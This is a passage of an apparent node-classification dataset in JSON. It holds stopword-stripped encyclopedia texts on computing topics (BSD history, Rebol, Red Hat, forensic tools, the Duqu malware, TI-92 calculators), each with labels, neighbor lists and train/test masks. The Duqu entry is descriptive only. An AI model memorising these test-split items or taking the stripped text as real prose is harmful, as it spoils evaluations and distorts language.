leffler ucb alan nemeth rob gurwitz bbn dennis ritchie bell labs keith lantz stanford rick rashid carnegie-mellon bert halstead mit dan lynch isi gerald j. popek ucla committee met april 1981 june 1983 apart fast file system several features outside contributors accepted including disk quotas job control sun microsystems provided testing motorola 68000 machines prior release ensuring portability system official 4.2bsd release came august 1983 notable first version released 1982 departure bill joy co-found sun microsystems mike karels marshall kirk mckusick took leadership roles within project point forward lighter note also marked debut bsd daemon mascot drawing john lasseter appeared cover printed manuals distributed usenix 4.3bsd released june 1986 main changes improve performance many new contributions 4.2bsd heavily tuned 4.1bsd code prior release bsd implementation tcp/ip diverged considerably bbn official implementation several months testing darpa determined 4.2bsd version superior would remain 4.3bsd see also history internet 4.3bsd determined bsd would move away aging vax platform power 6/32 platform codenamed tahoe developed computer consoles inc. seemed promising time abandoned developers shortly thereafter nonetheless 4.3bsd-tahoe port june 1988 proved valuable led separation machine-dependent machine-independent code bsd would improve system future portability apart portability csrg worked implementation osi network protocol stack improvements kernel virtual memory system van jacobson lbl new tcp/ip algorithms accommodate growth internet versions bsd incorporated proprietary unix code therefore subject software license source code licenses become expensive several outside parties expressed interest separate release networking code developed entirely outside would subject licensing requirement led networking release 1 net/1 made available non-licensees code freely redistributable terms bsd license released june 1989 4.3bsd-reno came early 1990 interim release early development 4.4bsd use considered gamble hence naming gambling center reno nevada release explicitly moving towards posix compliance according away bsd philosophy posix much based system v reno quite bloated compared previous releases among new features nfs implementation university guelph support hp 9000 range computers originating university utah hpbsd port august 2006 informationweek magazine rated 4.3bsd greatest software ever written commented bsd 4.3 represents single biggest theoretical undergirder internet net/1 bsd developer keith bostic proposed non-at sections bsd system released license net/1 end started project reimplement standard unix utilities without using code example vi based original unix version ed rewritten nvi new vi within eighteen months utilities replaced determined files remained kernel files removed result june 1991 release networking release 2 net/2 nearly complete operating system freely distributable net/2 basis two separate ports bsd intel 80386 architecture free 386bsd william jolitz proprietary bsd/386 later renamed bsd/os berkeley software design bsdi 386bsd short-lived became initial code base netbsd freebsd projects started shortly thereafter bsdi soon found legal trouble unix system laboratories usl subsidiary owners system v copyright unix trademark usl v. bsdi lawsuit filed 1992 led injunction distribution net/2 validity usl copyright claims source could determined lawsuit slowed development free-software descendants bsd nearly two years legal status question result systems based linux kernel legal ambiguity gained greater support although released 1992 development 386bsd predated linux linus torvalds said 386bsd gnu kernel available time probably would created linux lawsuit settled january 1994 largely berkeley favor 18,000 files berkeley distribution three removed 70 modified show usl copyright notices condition settlement usl would file lawsuits users distributors berkeley-owned code upcoming 4.4bsd release marshall kirk mckusick summarizes lawsuit outcome june 1994 4.4bsd released two forms freely distributable 4.4bsd-lite contained source whereas 4.4bsd-encumbered available earlier releases licensees final release berkeley 1995 4.4bsd-lite release 2 csrg dissolved development bsd berkeley ceased since several variants based directly indirectly 4.4bsd-lite freebsd netbsd openbsd dragonfly bsd maintained addition permissive nature bsd license allowed many operating systems free proprietary incorporate bsd code example microsoft windows used bsd-derived code implementation tcp/ip bundles recompiled versions bsd command-line networking tools since windows 2000 also darwin system apple macos built derivative 4.4bsd-lite2 freebsd various commercial unix operating systems solaris also contain varying amounts bsd code bsd base large number operating systems notable among today perhaps major open source bsds freebsd netbsd openbsd derived 386bsd 4.4bsd-lite various routes netbsd freebsd started life 1993 initially derived 386bsd 1994 migrating 4.4bsd-lite code base openbsd forked 1995 netbsd number commercial operating systems also partly wholly based bsd descendants including sun sunos apple inc. macos current bsd operating systems open source available download free charge bsd license notable exception macos also generally use monolithic kernel architecture apart macos dragonfly bsd feature hybrid kernels various open source bsd projects generally develop kernel userland programs libraries together source code managed using single central source repository past bsd also used basis several proprietary versions unix sun sunos sequent dynix next nextstep dec ultrix osf/1 axp tru64 unix parts next software became foundation macos among commercially successful bsd variants general market selection significant unix versions unix-like operating systems descend bsd includes",
    "neighbors": [
      2564,
      10761,
      2061,
      9743,
      8725,
      2584,
      1080,
      5177,
      5178,
      3651,
      7748,
      3142,
      7249,
      9306,
      607,
      7269,
      9320,
      9844,
      633,
      8316,
      6780,
      7806,
      4745,
      5771,
      7307,
      6797,
      4750,
      684,
      6837,
      1718,
      10436,
      9927,
      8395,
      6352,
      6361,
      6369,
      9444,
      5873,
      5384,
      8467,
      11539,
      5397,
      3350,
      7445,
      10016,
      1316,
      7460,
      4908,
      1839,
      7483,
      8524,
      850,
      11604,
      6491,
      873,
      5492,
      1399,
      1400,
      7552,
      5506,
      1927,
      7561,
      7057,
      9625,
      5534,
      3488,
      11689,
      2995,
      9151,
      7104,
      9153,
      9665,
      471,
      10202,
      3551,
      8671,
      998,
      4076,
      499,
      2035
    ],
    "mask": "Test"
  },
  {
    "node_id": 9453,
    "label": 3,
    "text": "10th_Frame:10th frame 10th frame ten-pin bowling simulation game created access software 1986 follow-up leaderboard golf game eight players could take part open bowling tournament choice 3 different difficulty levels—kids ball always went straight amateur professional lane viewed behind bowler pins towards top screen 3d perspective scorecard current player displayed lane player could move left right lane starting run-up holding fire target cursor could also moved pushing moving left right pressing returned control moving onscreen player position fire button held power meter similar leaderboard employed speed shot determined long button held small zone top determined player made error exaggerating spin meter started descend right stopped hook zone determine much hook/spin applied—from straight top zone full hook bottom play completed usual ten frames bonus balls animation used similar sprite system leaderboard falling pin physics handled well players could print scorecard end match game released various home computers zx spectrum amstrad cpc commodore 64 also released atari st msx nintendo entertainment system version planned eventually cancelled c vg reviewed commodore 64 version issue 65 called game month 9/10 score zzap 64 awarded game 85 issue 22 calling another slick extremely well programmed access sport simulation sinclair gave zx spectrum conversion 7 10 stating 10th frame requires lot skill pretty good simulation",
    "neighbors": [
      1220,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9454,
    "label": 9,
    "text": "Rebol:rebol rebol historically rebol cross-platform data exchange language multi-paradigm dynamic programming language designed carl sassenrath network communications distributed computing introduces concept dialecting small optimized domain-specific languages code data also notable property language according designer carl sassenrath douglas crockford known involvement development javascript described rebol modern language similar ideas lisp built upon representation data executable programs one json influences originally language official implementation proprietary closed source developed rebol technologies following discussion lawrence rosen rebol version 3 interpreter released apache 2.0 license december 12 2012 older versions available binary form source release planned rebol used program internet applications client- server-side database applications utilities multimedia applications rebol initially acronym relative expression based object language written caps align modern trends language naming represented e.g change replacing historical name lisp lisp programmers ceased practice writing rebol caps sassenrath eventually put naming question community debate blog subsequent writing sassenrath adopted convention writing language name rebol first released 1997 rebol designed 20-year period carl sassenrath architect primary developer amigaos based study denotational semantics using concepts programming languages lisp forth logo self one rebol design principles simple things simple ways following example visual interface dialect used describe simple hello world program graphical user interface similar example looks r3-gui rebol domain-specific languages called dialects micro-languages optimized specific purpose dialects used define business rules graphical user interfaces sequences screens installation program users define dialects reusing existing rebol word giving specific meaning dialect dialects interpreted functions processing rebol blocks parsing strings specific way example rebol dialecting abilities seen word codice_1 data exchange dialect codice_1 word specific meaning dialect codice_1 global variable referring native function passing back function result value visual interface dialect vid codice_1 keyword causing layout engine simulate carriage return moving rendering pen beginning next line rebol interpreter graphical abilities must understand interpret many dialects table lists important ones order significance rebol syntax free-form requiring specific positioning however indentation recommended better convey structure text human readers syntactic properties different dialects may differ common platform rebol dialects data exchange dialect dialects usually derived addition common platform dialects data exchange dialect directly used represent data metadata populate data structures send data internet save data storage contrast programming languages like c data exchange dialect consist declarations statements expressions keywords valid data exchange dialect text stream tree data structure consisting blocks root block implicit subblocks delimited square brackets parens delimited round brackets strings delimited double quotes curly brackets suitable multi-line strings caret notation used unprintable characters urls e-mail addresses files paths composite values unlike algol blocks rebol blocks composite values similar quoted s-expressions lisp fact code written form rebol blocks makes language homoiconic blocks well parens may contain composite values block may contain subblocks parens strings ... scalar values like words set-words words suffixed colon get-words words prefixed colon lit-words words prefixed apostrophe numbers money characters etc. separated whitespace note special characters allowed words codice_5 word unlike codice_6 sequence three words separated spaces comments may appear following semicolon end line multi-line comments comments ignored lexical parser written using ordinary datatypes like multi-line strings blocks containing domain-specific language submitted arguments specific evaluator functions frequently used evaluator codice_7 function used default interpret text input interpreter console dialect interpreted codice_7 function expression-oriented sublanguage data exchange dialect main semantic unit language expression contrast imperative programming languages descending algol dialect neither keywords statements words used case-insensitive variables like dynamically typed languages variables n't associated type type associated values result i.e evaluation word returned word encountered codice_7 function set-word form word used assignment statements assignment together functions side-effects used imperative programming subblocks root block evaluate property used handle data blocks structured programming submitting blocks arguments control functions like codice_10 codice_11 codice_12 etc. dialecting block passed specific interpreter function specific problem worth noting composite values assigned variables copied make copy value must passed codice_13 function codice_7 function normally follows prefix style evaluation function processes arguments follow however infix evaluation using infix operators exists infix evaluation takes precedence prefix evaluation example returns 1 since infix addition takes precedence computation absolute value evaluating infix expressions order evaluation left right operator takes precedence another example returns 20 evaluation giving precedence multiplication would yield 14 operators prefix versions codice_15 usually evaluates arguments passing function expression first reads wikipedia rebol page passes result codice_16 function parentheses used change order evaluation using prefix notation usage parentheses expressions avoided simple precedence rules advantage well disadvantage codice_17 function preferably used specify validate transform interpret dialects matching parse expressions run time parse expressions written parse dialect like dialect expression-oriented sublanguage data exchange dialect unlike dialect parse dialect uses keywords representing operators important nonterminals infix parsing operators n't prefix equivalents use precedence rules sequence higher precedence choice actions included taken parsing process well codice_17 function used process blocks strings string parsing level codice_17 must handle low level parsing taking account characters delimiters block parsing higher level handling scanning level rebol values parse dialect belongs family grammars represented top-down parsing language parsing expression grammar peg main similarity presence sequence choice operators family members parse dialect syntax similarities parse dialect peg illustrated transliteration peg example parses arithmetic expression official rebol 2.7.8 implementation available several editions /core /view /command /sdk /ios /core /view editions freely redistributable software runtime environment stored single executable file rebol/core 2.7.8 console edition 300 kb rebol/view 2.7.8 graphical user interface edition 650 kb size rebol/view provides platform-independent graphics sound access comes windowing toolkit extensible set styles gui widgets extended editions rebol/command 2.7.8 rebol/sdk 2.7.8 require paid license add features like odbc data access option create standalone executable files",
    "neighbors": [
      512,
      1152,
      6016,
      9345,
      3462,
      9224,
      2186,
      9871,
      6160,
      5395,
      11161,
      6555,
      8221,
      8479,
      9385,
      5546,
      7983,
      9780,
      1591,
      58,
      7612,
      1343,
      3904,
      6594,
      963,
      11332,
      8262,
      8775,
      9926,
      7627,
      10571,
      11219,
      2901,
      11221,
      11226,
      479,
      4069,
      6502,
      7805,
      7274,
      9195,
      5612,
      8430,
      9714,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9455,
    "label": 7,
    "text": "Red_Hat:red hat red hat inc. american multinational software company providing open-source software products enterprise community founded 1993 red hat corporate headquarters raleigh north carolina offices worldwide became subsidiary ibm july 9 2019 red hat become associated large extent enterprise operating system red hat enterprise linux acquisition open-source enterprise middleware vendor jboss red hat also offers red hat virtualization rhv enterprise virtualization product red hat provides storage operating system platforms middleware applications management products support training consulting services red hat creates maintains contributes many free software projects acquired several proprietary software product codebases corporate mergers acquisitions released software open-source licenses red hat second largest corporate contributor linux kernel version 4.14 intel october 28 2018 ibm announced intent acquire red hat 34 billion acquisition closed july 9 2019 1993 bob young incorporated acc corporation catalog business sold linux unix software accessories 1994 marc ewing created linux distribution named red hat linux ewing worn red cornell university lacrosse hat given grandfather attending carnegie mellon university ewing released software october became known halloween release young bought ewing business 1995 two merged become red hat software young serving chief executive officer ceo red hat went public august 11 1999 achieving eighth-biggest first-day gain history wall street matthew szulik succeeded bob young ceo december year bob young went found online print demand self-publishing company lulu 2002 november 15 1999 red hat acquired cygnus solutions cygnus provided commercial support free software housed maintainers gnu software products gnu debugger gnu binutils one founders cygnus michael tiemann became chief technical officer red hat vice president open-source affairs later red hat acquired wirespeed c2net hell kitchen systems february 2000 infoworld awarded red hat fourth consecutive operating system product year award red hat linux 6.1 red hat acquired planning technologies inc 2001 aol iplanet directory certificate-server software 2004 red hat moved headquarters durham north carolina state university centennial campus raleigh north carolina february 2002 following month red hat introduced red hat linux advanced server later renamed red hat enterprise linux rhel dell ibm hp oracle corporation announced support platform december 2005 cio insight magazine conducted annual vendor value survey red hat ranked 1 value second year row red hat stock became part nasdaq-100 december 19 2005 red hat acquired open-source middleware provider jboss june 5 2006 jboss became division red hat september 18 2006 red hat released red hat application stack integrated jboss technology certified well-known software vendors december 12 2006 red hat stock moved trading nasdaq rhat new york stock exchange rht 2007 red hat acquired metamatrix made agreement exadel distribute software march 15 2007 red hat released red hat enterprise linux 5 june acquired mobicents march 13 2008 red hat acquired amentra provider systems integration services service-oriented architecture business process management systems development enterprise data services july 27 2009 red hat replaced cit group standard poor 500 stock index diversified index 500 leading companies u.s. economy reported major milestone linux december 15 2009 reported red hat pay settle class action lawsuit related restatement financial results july 2004 suit pending u.s. district court eastern district north carolina red hat reached proposed settlement agreement recorded one-time charge quarter ended nov. 30 january 10 2011 red hat announced would expand headquarters two phases adding 540 employees raleigh operation investing state north carolina offering incentives second phase involves expansion new technologies software virtualization technology cloud offerings august 25 2011 red hat announced would move 600 employees n.c. state centennial campus two progress plaza downtown ribbon cutting ceremony held june 24 2013 re-branded red hat headquarters 2012 red hat became first one-billion dollar open-source company reaching annual revenue fiscal year red hat passed 2 billion benchmark 2015. company annual revenue nearly 3 billion october 16 2015 red hat announced acquisition automation startup ansible rumored estimated 100 million usd june 2017 red hat announced red hat hyperconverged infrastructure 1.0 software product may 2018 red hat acquired coreos october 28 2018 ibm announced intent acquire red hat us 34 billion one largest-ever acquisitions company operate ibm hybrid cloud division six months later may 3 2019 us department justice concluded review ibm proposed red hat acquisition according steven j. vaughan-nichols essentially approved ibm/red hat deal acquisition closed july 9 2019 red hat sponsors fedora project community-supported free software project aims promote rapid progress free open-source software content fedora aims rapid innovation using open processes public forums fedora project board comprises community leaders representatives red hat leads project steers direction project fedora linux distribution develops red hat employees work code alongside community members many innovations within fedora project make way new releases red hat enterprise linux red hat operates professional open-source business model based open-source software development within community professional quality assurance subscription-based customer support produce open-source code programmers make adaptations improvements red hat sells subscriptions support training integration services help customers using open-source software products customers pay one set price unlimited access services red hat network 24/7 support september 2014 however ceo jim whitehurst announced red hat midst major shift client-server cloud-mobile rich bynum member red hat legal team attributes linux success rapid development partially open-source business models including red hat red hat engineers worked one laptop per child initiative non-profit organization established members mit media lab design produce inexpensive laptop try provide every child world access open communication open knowledge open learning xo-4 laptop machine project runs slimmed-down version fedora 17 operating system red hat largest contributor gnome desktop environment several employees working full-time evolution official personal information manager gnome dogtail open-source automated graphical user interface gui test framework initially developed red hat consists free software released gnu general public license gpl written python allows developers build test applications red hat announced release dogtail 2006 red hat summit red hat mrg clustering product intended integrated high-performance computing hpc acronym mrg stands messaging realtime grid red hat enterprise mrg replaces red hat enterprise linux rhel linux distribution developed red hat kernel order provide extra support real-time computing together middleware support message brokerage scheduling workload local remote virtual machines grid computing cloud computing red hat works condor high-throughput computing system community also provides support software tuna performance-monitoring tool runs mrg environment red hat produces online publication opensource.com site highlights ways open-source principles apply domains software development site tracks application open-source philosophy business education government law health life company originally produced newsletter called brim wide open magazine first appeared march 2004 means red hat share technical content subscribers regular basis brim newsletter wide open magazine merged november 2004 become red hat magazine january 2010 red hat magazine became opensource.com 2007 red hat announced reached agreement free software open-source foss companies allowed make distribution portal called red hat exchange reselling foss software original branding intact however 2010 red hat abandoned exchange program focus efforts open source channel alliance began april 2009 red hat subscription management rhsm combines content delivery subscription management red hat operates openshift cloud computing platform service supporting applications written node.js php perl python ruby javaee july 31 2018 red hat announced release istio 1.0 microservices management program used tandem kubernetes platform software purports provide traffic management service identity security policy enforcement telemetry services order streamline kubernetes use various fedora-based operating systems red hat brian redbeard harring described istio aiming control plane similar kubernetes control plane configuring series proxy servers get injected application components red hat markets version openstack helps manage data center manner cloud computing red hat cloudforms provides management virtual machines instances containers based vmware vsphere red hat virtualization microsoft hyper-v openstack amazon ec2 google cloud platform microsoft azure red hat openshift cloudforms based manageiq project red hat open sourced code manageiq acquisition manageiq 2012 red hat contributes several software developers work libreoffice free open-source office suite red hat employees working full-time free open-source software projects red hat products two full-time employees working free software radeon david airlie jerome glisse one full-time employee working free software nouveau graphic drivers another project aerogear open-source project brings security development expertise cross-platform enterprise mobile development red hat also organises open source day events multiple partners show open-source technologies subscribers access red hat major products acquisitions red hat programmers produced software programming-tools utilities supplement standard unix linux software red hat products found way specifically red hat operating environments via open-source channels wider community utilities include red hat website lists organization major involvements free open-source software projects community projects aegis red hat include 2000 red hat created subsidiary red hat india deliver red hat software support services indian customers colin tenwick vice president general manager red hat emea said red hat india opened response rapid adoption red hat linux subcontinent demand open-source solutions indian markets rising red hat wants play major role region red hat india worked local companies enable adoption open-source technology government education 2006 red hat india distribution network 70 channel partners spanning 27 cities across india red hat india channel partners included markcraft solutions ashtech infotech pvt ltd efensys technologies embee software allied digital services softcell technologies distributors include integra micro systems ingram micro red hat first major acquisition involved delix computer gmbh-linux div linux-based operating-system division delix computer german computer company july 30 1999 red hat acquired cygnus solutions company provided commercial support free software january 11 2000 – company largest acquisition michael tiemann co-founder cygnus served chief technical officer red hat acquisition red hat made acquisitions 2000 five cygnus solutions bluecurve wirespeed communications hell kitchen systems c2net june 5 2006 red hat acquired open-source middleware provider jboss integrated division red hat december 14 1998 red hat made first divestment intel netscape acquired undisclosed minority stakes company next year march 9 1999 compaq ibm dell novell acquired undisclosed minority stakes red hat",
    "neighbors": [
      1026,
      6661,
      10757,
      4107,
      5644,
      13,
      3086,
      2063,
      6157,
      1553,
      4630,
      6166,
      5656,
      10780,
      9245,
      9762,
      7204,
      6694,
      555,
      8751,
      1584,
      561,
      5172,
      5689,
      11322,
      9276,
      2109,
      9281,
      8772,
      3143,
      11344,
      1106,
      6227,
      2134,
      6230,
      8792,
      5721,
      11353,
      5723,
      4194,
      1638,
      5222,
      8295,
      10344,
      10856,
      5742,
      3696,
      4729,
      2170,
      5755,
      2180,
      2693,
      9353,
      1164,
      6285,
      10382,
      8848,
      2709,
      5273,
      9882,
      2717,
      10397,
      4255,
      161,
      6311,
      5800,
      1705,
      9387,
      3245,
      5293,
      8877,
      10413,
      7345,
      9397,
      2234,
      1211,
      3771,
      6850,
      2762,
      6860,
      7375,
      5840,
      6352,
      10961,
      10971,
      8412,
      8928,
      1761,
      4841,
      9449,
      3820,
      9455,
      3826,
      8439,
      3323,
      253,
      3326,
      7941,
      5384,
      2315,
      6413,
      4367,
      5394,
      6932,
      1813,
      1820,
      8994,
      6947,
      7459,
      10530,
      4902,
      10022,
      823,
      10040,
      6458,
      5956,
      8520,
      5450,
      843,
      6988,
      6993,
      4438,
      859,
      2395,
      8539,
      2910,
      863,
      4960,
      4961,
      3938,
      1891,
      5471,
      5988,
      8554,
      7019,
      4463,
      2417,
      4979,
      5492,
      1910,
      3960,
      1400,
      6522,
      11643,
      6525,
      3966,
      11135,
      6018,
      8066,
      8582,
      3976,
      3978,
      5006,
      1939,
      5523,
      1435,
      2974,
      5534,
      8096,
      9118,
      930,
      9633,
      1444,
      1445,
      3493,
      4521,
      8106,
      4011,
      11179,
      11184,
      9137,
      9655,
      10172,
      5567,
      8644,
      1990,
      8149,
      3545,
      9179,
      6622,
      7134,
      9696,
      11235,
      7140,
      5095,
      488,
      3560,
      5096,
      6119,
      8170,
      9706,
      7663,
      11248,
      9564,
      10236,
      3582,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 9456,
    "label": 4,
    "text": "StegAlyzerAS:stegalyzeras steganography analyzer artifact scanner stegalyzeras computer forensics software made backbone security steganography analysis research center designed extend scope traditional digital forensic examinations allowing examiner scan suspect media forensic images suspect media known artifacts steganography applications artifacts may identified scanning file system well registry microsoft windows system stegalyzeras allows identification files using crc-32 md5 sha-1 sha-224 sha-256 sha-384 sha-512 hash values stored steganography application fingerprint database safdb safdb largest commercially available steganography hash set known registry keys identified using registry artifact key database rakdb distributed stegalyzeras",
    "neighbors": [
      9319,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 9457,
    "label": 1,
    "text": "Flora_Europaea:flora europaea flora europaea 5-volume encyclopedia plants published 1964 1993 cambridge university press aim describe national floras europe single authoritative publication help readers identify wild widely cultivated plant europe subspecies level also provides information geographical distribution habitat preference chromosome number known flora released cd form 2001 royal botanic garden edinburgh made index plant names available online idea pan-european flora first mooted 8th international congress botany paris 1954 1957 britain science engineering research council provided grants fund secretariat three people volume 1 published 1964 volumes issued following years culminating 1980 monocots volume 5 royalties put trust fund administered linnean society allowed funding dr john akeroyd continue work project revised volume 1 launched linnean society 11 march 1993 editors named every edition revised edition volume 1 cd set panel regional advisers formed order ensure full coverage whole europe several advisers also authors respective taxonomic specialities country representatives geographical distribution indicated series two letter codes",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9458,
    "label": 4,
    "text": "Guidance_Software:guidance software guidance software inc. public company nasdaq guid founded 1997 headquartered pasadena calif. company developed provided software solutions digital investigations primarily united states europe middle east africa asia/pacific rim guidance software offices brazil chicago houston new york city san francisco singapore united kingdom washington d.c. employed approximately 371 employees september 14 2017 company acquired opentext best known encase digital investigations software guidance software product line organized around four markets digital forensics endpoint security analytics cyber security incident response e-discovery company served law-enforcement government agencies well corporations various industries financial insurance services technology defense contracting telecom pharmaceutical healthcare manufacturing retail company operated four business segments products professional services training maintenance operates two certification programs encase® certified examiner ence® encase® certified ediscovery practitioner encep® designations may 2010 company completed acquisition tableau llc february 2012 guidance software acquired casecentral guidance software noted number high-profile use cases 2002 guidance software encase used murder trial david westerfield examine computers disks connect child pornography year encase used french police uncover emails now-convicted shoe bomber richard colvin reid 2004 encase software used trial convicted scott peterson murder wife laci peterson computer forensic experts used encase examine peterson five computer hard drives provided valuable evidence shopped online boat studied water currents bought gift mistress weeks leading wife death showed interest computer map included brooks island wife later found 2005 american serial killer dennis lynn rader also known btk killer sent floppy disk fox affiliate ksas-tv wichita kansas using encase police able find metadata embedded deleted microsoft word document unbeknownst rader disk metadata contained christ lutheran church document marked last modified dennis search church website turned dennis rader president congregation council police began surveillance rader 2011 following sony online entertainment multiple security breaches sony said would working data forté guidance software protiviti resolve playstation breach may 2011 killing osama bin laden reported assault team navy seals removed computers hard drives usb sticks dvds bin laden compound forensic analysis based job description supporting task guidance software encase believed tool selected analysis electronic gear later year guidance software encase noted forensic software tool used trial casey anthony following death daughter caylee anthony investigators used encase search digital cameras computers using software detective sandra osborne orange county sheriff department found correctly incorrectly spelled searches word “ chloroform ”",
    "neighbors": [
      1873,
      5284,
      11182
    ],
    "mask": "None"
  },
  {
    "node_id": 9459,
    "label": 5,
    "text": "Mailx:mailx mailx unix utility program sending receiving mail also known mail user agent program console application command syntax similar ed posix standardized variant berkeley mail utility",
    "neighbors": [
      1664,
      9986,
      3465,
      8975,
      9747,
      11418,
      2211,
      9642,
      1075,
      2101,
      9909,
      9542,
      3015,
      10956,
      7255,
      6231,
      9451,
      10861,
      5492,
      3578,
      8443,
      7036
    ],
    "mask": "Test"
  },
  {
    "node_id": 9460,
    "label": 4,
    "text": "Duqu:duqu duqu collection computer malware discovered 1 september 2011 thought related stuxnet worm created unit 8200 laboratory cryptography system security crysys lab budapest university technology economics hungary discovered threat analysed malware wrote 60-page report naming threat duqu duqu got name prefix ~dq gives names files creates term duqu used variety ways symantec based crysys team managed dr thibault gainche report continued analysis threat called nearly identical stuxnet completely different purpose published detailed technical paper cut-down version original lab report appendix symantec believes duqu created authors stuxnet authors access source code stuxnet worm like stuxnet valid abused digital signature collects information prepare future attacks mikko hyppönen chief research officer f-secure said duqu kernel driver jminet7.sys similar stuxnet mrxcls.sys f-secure back-end system thought stuxnet hyppönen said key used make duqu digital signature observed one case stolen c-media located taipei taiwan certificates due expire 2 august 2012 revoked 14 october 2011 according symantec another source dell secureworks reports duqu may related stuxnet however considerable growing evidence duqu closely related stuxnet experts compared similarities found three points interest like stuxnet duqu attacks microsoft windows systems using zero-day vulnerability first-known installer aka dropper file recovered disclosed crysys lab uses microsoft word document exploits win32k truetype font parsing engine allows execution duqu dropper relates font embedding thus relates workaround restrict access t2embed.dll truetype font parsing engine patch released microsoft december 2011 yet installed microsoft identifier threat ms11-087 first advisory issued 13 november 2011 duqu looks information could useful attacking industrial control systems purpose destructive known components trying gather information however based modular structure duqu special payload could used attack type computer system means thus cyber-physical attacks based duqu might possible however use personal computer systems found delete recent information entered system cases total deletion computer hard drive internal communications duqu analysed symantec actual exact method replicates inside attacked network yet fully known according mcafee one duqu actions steal digital certificates corresponding private keys used public-key cryptography attacked computers help future viruses appear secure software duqu uses 54×54 pixel jpeg file encrypted dummy files containers smuggle data command control center security experts still analyzing code determine information communications contain initial research indicates original malware sample automatically removes 36 days malware stores setting configuration files would limit detection key points command control servers duqu analysed seems people running attack predilection centos 5.x servers leading researchers believe zero-day exploit servers scattered many different countries including germany belgium philippines india china kaspersky published multiple blogposts command control servers",
    "neighbors": [
      1024,
      5636,
      3092,
      4117,
      8726,
      535,
      9246,
      9761,
      4644,
      4133,
      10309,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      161,
      675,
      9904,
      9395,
      8886,
      704,
      3789,
      4304,
      6360,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9537,
      6484,
      857,
      1882,
      7515,
      3423,
      9569,
      5986,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      9129,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      9688,
      5087,
      1504,
      8674,
      9186,
      2542,
      507,
      2045,
      9214
    ],
    "mask": "Test"
  },
  {
    "node_id": 9461,
    "label": 3,
    "text": "Kwort_Linux:kwort linux kwort linux distribution based crux kwort desktop environment openbox distribution available download dual-arch installation-only live cd iso image suitable 32-bit i386 64-bit x86_64 computers basic boot screen text-mode graphic installer uses session powered xfce system requirements kwort kwort linux uses pkg package manager pkg download install packages kwort repository mirrors others tux machines reviewed kwort linux march 2006 review included following jesse smith wrote review kwort 4.3 distrowatch weekly",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      3903,
      11587,
      2375,
      5959,
      2383,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 9462,
    "label": 7,
    "text": "Scalable_Cluster_Environment:scalable cluster environment opensce open scalable cluster environment open-source beowulf-clustering software suite led kasetsart university thailand started small system monitoring cluster called scms scalable cluster monitoring system extend base many sub-project currently opensce following components currently opensce project moved umbrella thai national grid project led thai national grid center components opensce especially scmsweb used monitor many grid computing researches pragma apgrid also thai national grid",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9463,
    "label": 3,
    "text": "TI-92_series:ti-92 series ti-92 series graphing calculators line calculators produced texas instruments include ti-92 1995 ti-92 plus 1998 1999 voyage 200 2002 design relatively large calculators includes qwerty keyboard keyboard given status computer rather calculator american testing facilities used tests sat ap exams similar ti-89 ti-92 originally released 1995 first symbolic calculator made texas instruments came computer algebra system cas based derive one first calculators offer 3d graphing ti-92 allowed standardized tests due mostly qwerty keyboard larger size also rather cumbersome compared graphing calculators response concerns texas instruments introduced ti-89 functionally similar original ti-92 featured flash rom 188 kb ram smaller design without qwerty keyboard ti-92 replaced ti-92 plus essentially ti-89 larger qwerty keyboard design ti-92 eventually ti released voyage 200 smaller lighter version ti-92 plus flash rom ti-92 longer sold ti dealers hard come stores ti-92 ii released 1996 first successor ti-92 ti-92 ii available stand-alone product user-installable ii module could added original ti-92 units gain feature improvements ti-92 ii module introduced early 1996 added choice 5 user languages english french german italian spanish additional 128k user memory along ti-92 ti-92 ii replaced ti-92 plus 1999 offered even flash rom ram ti-92 plus ti-92+ released 1998 slightly creation almost-identical terms software ti-89 physically looking exactly predecessor ti-92 lacked flash memory besides increased memory predecessor ti-92 plus also featured sharper black screen first appeared ti-89 eases viewing ti-92 plus available stand-alone product user-installable plus module could added original ti-92 ti-92 ii units gain feature improvements notably flash memory stand-alone ti-92 plus calculator functionally similar hw2 ti-89 module-upgraded ti-92 functionally similar hw1 ti-89 versions could run releases operating system software 2002 ti-92 plus succeeded voyage 200 longer sold ti dealers voyage 200 also v200 voyage 200 plt released 2002 replacement ti-92 plus hardware upgrade calculator increase amount flash memory available 2.7 megabytes voyage 200 vs. 702 kilobytes ti-92 plus also features somewhat smaller rounded case design like predecessor voyage 200 advanced calculator supports plotting multiple functions graph parametric polar 3d differential equation graphing well sequence representations symbolic calculation system based trimmed version calculation software derive addition algebra calculus capabilities voyage 200 packaged list spreadsheet data processing applications perform curve fitting number standard functions statistical analysis operations calculator also run programs written ti-89 ti-92 well programs 